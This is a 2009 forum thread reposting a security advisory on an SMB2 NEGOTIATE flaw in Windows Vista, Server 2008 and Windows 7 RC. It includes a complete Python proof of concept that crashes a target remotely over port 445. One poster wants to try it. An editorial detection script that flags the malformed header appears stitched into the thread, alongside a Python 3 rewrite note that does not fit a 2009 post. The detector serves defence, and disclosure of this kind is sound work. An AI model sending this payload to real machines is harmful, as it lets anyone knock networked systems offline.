hirosima Posted September 13, 2009

=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC:
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows Vista and newer versions of Windows come with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
[Edit]
Unfortunately this SMB2 security issue is specifically due to an MS patch for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 creates the following issue:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it is used to identify the SMB dialect that will be used for further communication.

IV. PROOF OF CONCEPT
-------------------------
Smb-Bsod.py:

#!/usr/bin/env python3
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
# (bytes literals so the script runs under Python 3; the payload is unchanged)
from socket import socket

host = "IP_ADDR", 445  # target address and TCP port 445 (SMB over TCP)

buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, 0x90 = 144 bytes follow
    b"\xff\x53\x4d\x42"  # Server Component: SMB (\xffSMB)
    b"\x72\x00\x00\x00"  # Command 0x72: Negotiate Protocol, then first 3 bytes of NT status
    b"\x00\x18\x53\xc8"  # last status byte, Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # Process ID High: --> normal value should be "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # signature(8), reserved, TID, PID low
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, dialects...
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"  # dialect strings: 0x02 + name + NUL
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"  # ends with "SMB 2.002", the dialect that routes the request to SMB2
)

s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
Windows XP and 2000 are NOT affected, as they don't have this driver.

VI. SYSTEMS AFFECTED
-------------------------
[Edit]
Windows Vista All (64b/32b | SP1/SP2 fully updated), Windows Server 2008 < R2, Windows 7 RC.

VII. SOLUTION
-------------------------
No patch available for the moment.
Disable the SMB feature and close its ports until a patch is provided.
Configure your firewall properly.
You can also follow the MS workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES
-------------------------
Many people have suggested updating this advisory to RCE instead of BSOD:
it won't be done; if they find a way to execute code, they will publish their own advisory.

# milw0rm.com [2009-09-09]

I want to try it out to see if it really works...
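The advisory says the crash is triggered by a malformed SMB header on the NEGOTIATE PROTOCOL REQUEST, specifically a nonzero Process ID High field. The following is an added example, not code from the advisory or from Laurent Gaffié: it decodes the 32-byte SMB1 header (field order per MS-CIFS) and the dialect list from a raw NetBIOS-framed packet, and turns the advisory's observation into a detection rule. The builder, the names build_negotiate/parse_negotiate/check_negotiate and both sample packets are constructed here; the header values and dialect list mirror the PoC above so the constructed malformed packet has the same layout.

```python
#!/usr/bin/env python3
"""Decode an SMB1 NEGOTIATE PROTOCOL REQUEST and flag a nonzero Process ID High.
Added example; the packet builder and sample inputs are constructed, not captured."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# 32-byte SMB1 header, little-endian (MS-CIFS 2.2.3.1): Protocol, Command, Status,
# Flags, Flags2, PIDHigh, SecurityFeatures, Reserved, TID, PIDLow, UID, MID
HEADER_FMT = "<4sBIBHH8sHHHHH"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 32
NB_LEN = 4  # NetBIOS session service header: type byte + 24-bit big-endian length

# Dialects offered by the advisory's PoC, in the same order.
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
            b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002"]


def build_negotiate(dialects, pid_high=0):
    """Constructed helper: NetBIOS header + SMB1 NEGOTIATE request.
    Flags, Flags2, TID and PIDLow mirror the PoC so the output has its layout."""
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)  # 0x02 + name + NUL each
    header = struct.pack(HEADER_FMT, SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                         pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = header + struct.pack("<BH", 0, len(body)) + body  # WordCount=0, ByteCount
    return struct.pack(">I", len(smb)) + smb  # type 0x00 + length, 4 big-endian bytes


def parse_negotiate(packet):
    """Return header fields and dialect names. Structural problems raise ValueError;
    odd field values (such as PIDHigh) are returned so a caller can judge them."""
    if len(packet) < NB_LEN + HEADER_LEN + 3:
        raise ValueError("packet too short for an SMB1 NEGOTIATE request")
    if packet[0] != 0x00 or int.from_bytes(packet[1:4], "big") != len(packet) - NB_LEN:
        raise ValueError("bad NetBIOS session header")
    (magic, cmd, status, flags, flags2, pid_high, _sig, _rsvd,
     tid, pid_low, uid, mid) = struct.unpack_from(HEADER_FMT, packet, NB_LEN)
    if magic != SMB_MAGIC:
        raise ValueError("not an SMB1 packet")
    if cmd != SMB_COM_NEGOTIATE:
        raise ValueError("command 0x%02x is not NEGOTIATE" % cmd)
    word_count, byte_count = struct.unpack_from("<BH", packet, NB_LEN + HEADER_LEN)
    data = packet[NB_LEN + HEADER_LEN + 3:]
    if word_count != 0 or byte_count != len(data) or not data.endswith(b"\x00"):
        raise ValueError("WordCount/ByteCount do not match the payload")
    dialects = []
    for item in data.split(b"\x00"):
        if not item:
            continue
        if item[0] != 0x02:  # every entry must start with the Dialect buffer-format byte
            raise ValueError("malformed dialect entry")
        dialects.append(item[1:].decode("ascii"))
    return {"status": status, "flags": flags, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid, "dialects": dialects}


def check_negotiate(packet):
    """Detection rule: a NEGOTIATE request carrying a nonzero PIDHigh is the
    trigger the advisory describes. Returns a list of findings (empty = normal)."""
    info = parse_negotiate(packet)
    findings = []
    if info["pid_high"] != 0:
        raw = packet[16:18]  # PIDHigh is at offset 16 once the NetBIOS header is counted
        findings.append("nonzero PIDHigh %r (0x%04x) in NEGOTIATE offering %s"
                        % (raw, info["pid_high"], ", ".join(info["dialects"])))
    return findings


if __name__ == "__main__":
    benign = build_negotiate(DIALECTS)
    malformed = build_negotiate(DIALECTS, pid_high=0x2600)  # 00 26 on the wire, as in the PoC
    for name, pkt in (("benign", benign), ("malformed", malformed)):
        print(name, len(pkt), "bytes:", check_negotiate(pkt) or "ok")
```

The parser rejects framing and length errors outright but deliberately returns the PIDHigh value rather than raising on it, so the same decode can feed either a sensor that alerts on the advisory's trigger or a client-side sanity check. Feeding it the PoC's own bytes is equivalent to the constructed malformed packet, which is built with pid_high=0x2600 because the two-byte field is little-endian and the PoC places the 0x26 in the second byte.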
chr(0) Posted September 13, 2009

And what result did you get? Of course it works; it wasn't published just for the fun of it, and information was posted on Microsoft's site too.
Cheater Posted September 14, 2009

It was patched a few weeks ago through Windows Update ;)